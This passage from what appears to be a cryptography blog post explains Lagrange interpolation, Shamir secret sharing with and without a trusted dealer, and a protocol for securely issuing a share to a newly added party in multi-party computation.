\[P(x) = \sum_{i=0}^ty_i\pi_i^t(x)\]First, according to the previous two observations and since each $\pi_i^t(x)$ is a degree $\leq t$ polynomial, by multiplying each $\pi_i^t(x)$ by a constant $y_i$ and summing them, the result is also a polynomial of degree $\leq t$, so we have check the first requirement, great! Next, for each $x_i$ we get that:
\[\begin{split} P(x_i) & = \sum_{j=0}^ty_j\pi_j^t(x_i) \\ & = y_i\cdot\overset{=1}{\overbrace{\pi_i^t(x_i)}} + \sum_{j=0\\ j\neq i}^ty_j\overset{=0}{\overbrace{\pi_j^t(x_i)}} \\ & = y_i \end{split}\]By that achieving the requested interpolation. This interpolation algorithm is known as “Lagrange Interpolation” and the $\pi_i^t$ are often referred to as “Lagrange Polynomials”.
Now that we know how a polynomial can be (uniquely) interpolated from a set of its evaluations, let’s go back to the original polynomials-based secret-sharing scheme. The sharing goes as follows. The trusted dealer, who knows the secret $s$ will generate a polynomial $F(x)=\sum_{i=0}^tf_ix^i$ of degree $t$ such that $F(0) = f_0 = s$ and for $1\leq i \leq t$ the dealer will pick $f_i$ randomly from the field $\mathbb{Z}_p$. The dealer will send, for each party $i$ between $1$ and $n$ its share $p_i = F(i)$. In other words, each party $i$ has a share of the secret which is the polynomial $F$ evaluated at point $i$.
So why is this even working? Since the polynomial $F$ is of degree $t$, any set of $t+1$ parties will be able to derive $F$ according the to unique interpolation theorem. However, for any set of $t$ parties, they will not be able to learn anything about $F$ or $s$ since up to $p$ different polynomials can be created that all agree with the evaluations of $F$ given to these $t$ parties, and each will be evaluated to a diffenret value at point $0$.
This is all fun, but at this point we have this trusted dealer which we must trust and who is accessible to the secret. In many MPC scenarios we want some secret $s$ to never exist at a single point but still be able to make some computations based on its value. Therefore, we must find a way to get rid of the trusted dealer.
In this section we will try to get rid of the dealer and still achieve the same effect of Shamir’s secret sharing where a subset of $t+1$ out of $n$ parties, each holding $p_i$ - a share of a secret, can restore the secret, but without a dealer. One question that must be asked at this point is what is the meaning of $s$? In particular, since no one knows $s$ (since there is no dealer), what exactly are we trying to achieve? Well, we will change our goal by a little bit so that instead of sharing an existing secret $s$ held by the dealer, the parties will generate cooperatively a secret and share it between them without any party at any time holding the secret as a whole (or any information that may allow it to compute it efficiently).
This can be achieved in the following way. Party $i$ (for all $1\leq i \leq n$) will generate a local secret denoted $s_i$ so that the final secret $s$ shared among all parties will be $s = \sum_{i=1}^{n}s_i$. To achieve this, each party $i$ will share $s_i$ between all parties by following the steps of the dealer from the previous section. To be explicit, it will randomly create a polynomial $F_i(x)$ of degree at most $t$ such that $F_i(0) = s_i$ and send to party $j$ a share of this secret denoted by $p_{i,j}=F_i(j)$. Now each party $j$ who hold the secret shares $\left(p_{1,j},…,p_{n,j}\right) = \left(F_1(j),…,F_n(j)\right)$ will sum all these shares to get $p_j = \sum_{i=1}^np_{i,j}$. Since $F_i(x)$ are all polynomials of degree $t$, their sum is also a polynomial of degree at most $t$ denoted by $F(x) = \sum_{i=1}^nF_i(x)$. Notice that:
Therefore, the parties ended in a state where each party holds a secret-share $p_j$ which is the evaluation of a degree $\leq t$ polynomial $F(x)$ at point $j$ and the shared secret is $s=F(0)$. From previous section we know that this allows each subset of parties of size $\geq t+1$ to compute the secret and any subset of $\leq t$ parties will not be able to derive any information about the secret.
Without getting too much into details, the share $s$ isn’t exposed to any party along the way because if it did, it would imply the original secret-sharing algorithm from previous section to be insecure, but it is secure because of the unique-interpolation theorem.
Now that we know just enough about how secret shares are generated, we consider the scenario in which a set of $n$ parties have a secret shared among them so that each party $i$ holds a share of the secret, denoted $p_i=F(i)$ where $F(x)$ is a polynomial of degree at most $t$ and $F(0)=s$ where $s$ is the shared-secret which isn’t known fully to any party. The problem we want to solve is being able add party $n+1$ to the setup so that it will have its own share of the secret, $p_{n+1} = F(n+1)$ while maintaining the demand that each set of $t+1$ parties will be able to make some MPC-driven computations on the secret and any set of up to $t$ parties will not be able to do so.
The most naive approach is to gather all $n+1$ parties together, the original $n$ parties will forget about their existing shares $p_i$ and all parties will derive new shares $p’_i$ of a new secret $s’$. This is dissatisfactory since we don’t want the existing secret to change. On top of that, we would be happy if the solution will require as little communication as possible.
Party $n+1$ should obtain $p_{n+1}=F(n+1)$ in a way that only it will learn $F(n+1)$ and no other party will learn anything about it. After obtaining this piece of information, the party will be able to collaborate with any set of $t$ additional parties to perform MPC-driven computations on the secret. The key observation which has driven us is:
If it only takes $t+1$ parties to compute the secret $s=F(0)$ it shouldn’t take more than $t+1$ parties to evaluate $F(n+1)$ and send it to party $n+1$.
According to this mindset, it should be possible to achieve a solution where not all parties are required to add new party in the happy flow where none of the parties is malicious.
One naive way in which a set of $t+1$ parties numbered $x_1,..,x_{t+1}$ could have done this is so that party $i$ will compute $Q_i=p_{x_i}\cdot\pi_{x_i}^t(n+1)$ and send it to the new party who will in turn sum these inputs to obtain $F(n+1)=\sum_{i=1}^{t+1}Q_i=\sum_{i=1}^{t+1}\left(p_{x_i}\cdot\pi_{x_i}^t(n+1)\right)$.
However, this imposes a major security risk, since party $n+1$ receiving $Q_i$ can divide it by $\pi_{x_i}^t(n+1)$ (notice that $\pi_{x_i}^t$ is a publicly known polynomial) and obtain $y_i$ for each $i$ and thus reconstruct the polynomial $F(x)$ with those $t+1$ shares and obtain the secret! Therefore, we should look for another solution that doesn’t violate the security requirements.
Each party $i$ out of the $t+1$ collaborating parties could locally compute their local additive share of $F(n+1)$ which is $Q_i=p_{x_i}\cdot\pi_{x_i}^t(n+1)$. As mentioned earlier the sum of the $Q_i$ s equals to the share of party $n+1$ which is $F(n+1)$. ($\triangle$)
Thus, we will think of their sum as a secret and we would like to share it. Recall that Shamir’s Secret Sharing algorithm without a dealer allowed some parties to distribute a secret between them so that the shared secret will be the sum of the local secrets of all parties. In our case the local secret of each party will be $Q_i$ and running this algorithm where each party uses $Q_i$ as the local secret will result in each party $i$ holding the evalution of some polynomial $G(x)$ at point $i$ such that $G(0)$ is the sum of all local secrets $Q_i$ which equals to $F(n+1)$ which is the share of party $n+1$ (see $\triangle$). Each party will send their respective evaluation of the polynomial $G(i)$ to party $n+1$ who will be able to reconstruct polynomial $G(x)$ and compute $F(n+1)$. Assuming Shamir’s secret sharing without a dealer is secure, no party should be able to infer $G(0)=F(n+1)$ and party $n+1$ shouldn’t be able to infer the secrets of the rest of the parties.
]]>